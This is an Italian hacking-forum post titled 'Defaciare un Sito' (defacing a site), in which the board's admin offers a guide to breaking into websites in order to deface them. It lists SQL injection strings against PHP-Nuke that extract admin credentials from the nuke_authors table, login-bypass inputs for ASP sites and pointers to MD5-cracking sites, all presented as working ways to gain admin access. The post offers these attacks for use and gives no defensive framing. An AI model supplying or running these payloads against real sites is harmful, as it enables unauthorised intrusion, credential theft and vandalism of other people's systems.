Total Hack Cheat
Benvenuto/a su Total hack Cheat....
non aspettate altro tempo Registratevi!!

Defaciare un Sito

Andare in basso

Defaciare un Sito

Messaggio Da RaYoZ il Mar Set 07, 2010 3:39 pm

Salve, oggi posto una guida su come defacciare i seguenti portali:
PHP Site
PHP-Nuke Site
ASP Site
PHPBB
PHPBB2 Forum
JPortal
GuestBook
Invision PowerBoard
Powered by FrontPage
_____________________|

________________________________________|
PHP-Nuke Site
Ora vi illustro 3 exploit moderni e funzionanti;

Exploit ? Modulo Cerca

Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%?) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.

Exploit ? Top10

Questo modulo non ? presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un p? di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l?exploit: [Devi essere iscritto e connesso per vedere questo link]
%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd
,1,1%20FROM%20nuke_authors (tutto attaccato).
Se funziona ci collegheremo come Admin.

Exploit ? Sql Injection

Scriviamo nella barra degli indirizzi la stringa: [Devi essere iscritto e connesso per vedere questo link]
Avremo come risultato una scritta che dice ?Selection from the databse failed!? Se avremo esattamente questo risultato siamo dentro.

Con la stringa [Devi essere iscritto e connesso per vedere questo link] si pu? creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass

ASP Site
In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root

Diventare Utenti senza Neanche registrarsi:

UserName: apostrofo
Password: [nessuna password, lasciate vuoto]

Accedere da Admin:

UserName: ? union select Password,1,1,1 from members where UserID = ?admin??
Password: [nessuna password]

Diventare automaticamente amministratori

UserName: admin? ?
Password: [nessuna pass]

Primo utente nella lista

UserName: ? or 0=0 ?sp_password
Password: [nessuna pass]
_________________________________|
____|Qualke sito per decriptare psw in md5|_____
[Devi essere iscritto e connesso per vedere questo link]
[Devi essere iscritto e connesso per vedere questo link]

Fonte : Web
avatar
RaYoZ
Admin
Admin

Messaggi : 1040
Punti : 2245
Data d'iscrizione : 03.04.10
Età : 24
Località : immerso nei pensieri

Torna in alto Andare in basso

Torna in alto

- Argomenti simili

 
Permessi di questa sezione del forum:
Non puoi rispondere agli argomenti in questo forum